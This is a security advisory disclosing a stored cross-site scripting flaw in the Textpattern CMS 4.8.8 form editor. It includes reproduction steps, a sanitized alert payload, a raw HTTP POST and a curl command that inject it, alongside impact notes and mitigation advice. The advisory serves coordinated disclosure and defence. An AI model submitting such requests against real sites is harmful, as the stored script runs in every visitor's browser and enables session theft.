## https://sploitus.com/exploit?id=5EE02097-0AB8-5A79-A825-5764C5265F57
# Textpattern CMS 4.8.8 โ Stored XSS Advisory
**Title:** Stored Cross-Site Scripting (Stored XSS) in Textpattern CMS โ Form editor (`index.php?event=form`)
**Date:** 2025-09-17
**Author:** lyv404
**Vendor Homepage:** [https://textpattern.com/](https://textpattern.com/)
**Repository / Download:** [https://github.com/textpattern/textpattern](https://github.com/textpattern/textpattern)
**Product:** Textpattern CMS
**Version:** 4.8.8 (confirmed)
**Tested on:** Chrome 139 (Windows) / Burp Suite for request capture
---
## Summary / Impact
An authenticated user with privileges to create or edit forms (tested with an administrative account) can inject arbitrary HTML/JavaScript into the **Form code** field. The injected content is persisted in the database and later rendered on public pages without proper escaping. The malicious script executes in the browsers of any visitor who views or interacts with the form (including regular authenticated users and anonymous visitors). Possible impacts include session theft, CSRF chaining, data exfiltration and site defacement.
---
## Full Technical Description
**Product:** Textpattern CMS
**Affected version(s):** 4.8.8 (confirmed)
**Vulnerability type:** Stored Cross-Site Scripting (CWE-79)
**Conditions:**
* Authentication: Yes (privilege required: account that can create/edit forms; typically admin in tested instance).
* Vector: Web (admin panel).
* Location: persisted in the database and reflected on public pages that render the form.
## Reproduction (sanitized PoC)
1. Log in to the Textpattern admin panel:
```
http:///textpattern-4.8.8/textpattern/index.php
```
2. Navigate to **Forms** โ **New form** (or `?event=form` โ New form).
3. In the **Form code** field paste the payload:
```html
alert('XSS')
```
4. Save the form.
5. Visit the public page that renders the form (e.g. the site root or the page where the form is embedded). The alert should execute for any visitor who opens or interacts with that page โ demonstrating stored XSS.
## Sanitized raw HTTP request (example)
*Replace placeholders (``, ``, ``, ``) with values from your instance before use.*
```
POST /textpattern-4.8.8/textpattern/index.php HTTP/1.1
Host:
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryExample
Cookie: txp_login=; txp_login_public=
------WebKitFormBoundaryExample
Content-Disposition: form-data; name="event"
form
------WebKitFormBoundaryExample
Content-Disposition: form-data; name="step"
------WebKitFormBoundaryExample
Content-Disposition: form-data; name="_txp_token"
------WebKitFormBoundaryExample
Content-Disposition: form-data; name="name"
poc-xss
------WebKitFormBoundaryExample
Content-Disposition: form-data; name="form_code"
alert('XSS')
------WebKitFormBoundaryExample--
```
## Sanitized curl example
```bash
curl -i -X POST "http:///textpattern-4.8.8/textpattern/index.php" \
-H "Cookie: txp_login=; txp_login_public=" \
-F "event=form" \
-F "step=" \
-F "_txp_token=" \
-F "name=poc-xss" \
-F "form_code=alert('XSS')"
```
---
## Evidence / Screenshots (attach these files to the report)
1. `01_form_create.png` โ Admin UI showing the payload inside the **Form code** field before saving.
2. `02_exploit_alert.png` โ Public page showing the alert popup (regular user or anonymous view triggering the payload).
3. `03_burp_request.png` โ Burp capture showing the POST request that created the form (sanitize cookies/tokens in the file you attach).
4. `04_db_evidence.png` โ phpMyAdmin / SQL screenshot showing the stored payload in the DB row (or a sanitized `SELECT` output).
5. (Optional) `05_video_short.mp4` โ 5โ10s recording: create form โ visit public page โ alert.
**Note:** sanitize all network captures and logs: replace live tokens/cookies with `` before attaching.
---
## Verification Notes
* Verified trigger with a non-admin user: after creating the malicious form as admin, logging in as a regular user and opening the page with the form triggered the payload. This demonstrates that **creation requires elevated privilege but execution affects all viewers**.
* If triage requires proof of exfiltration or further proof-of-concept, provide full logs and DB export via PGP-encrypted channel (request recipient's PGP public key).
---
## Impact
Execution of attacker-controlled JavaScript in the browser of site visitors. Possible impacts include session token theft, CSRF chaining (performing privileged actions if an admin visits), credential/data exfiltration, account takeover when chained with other vulnerabilities, and site defacement.
---
## Mitigation recommendations
1. **Context-aware output encoding**: escape stored `form_code` when rendering (encode for HTML context).
2. **Server-side validation**: sanitize or whitelist allowed constructs in the Form code field (reject `` tags).
3. **Privilege hardening & auditing**: restrict who can create/edit forms and log those actions.
4. **CSP**: add a restrictive Content Security Policy as defense-in-depth (not a replacement for proper escaping).
---
## Disclosure / Contact
* **Vendor contacted:** [security@textpattern.com](mailto:security@textpattern.com) on 2025-09-17.
* **Requested:** coordinated disclosure and CVE assignment.
* **Researcher:** lyv404 โ [romulolyvio@gmail.com](mailto:romulolyvio@gmail.com)
---
## Attachments to include with this advisory (zip them)
* `01_form_create.png`
* `02_exploit_alert.png`
* `03_burp_request_sanitized.png`
* `04_db_evidence.png`
* `05_environment.txt` (Apache/PHP/Textpattern/browser + discovery date)
* `06_poc_request_sanitized.txt` (raw POST with `` tokens)
---
*End of advisory.*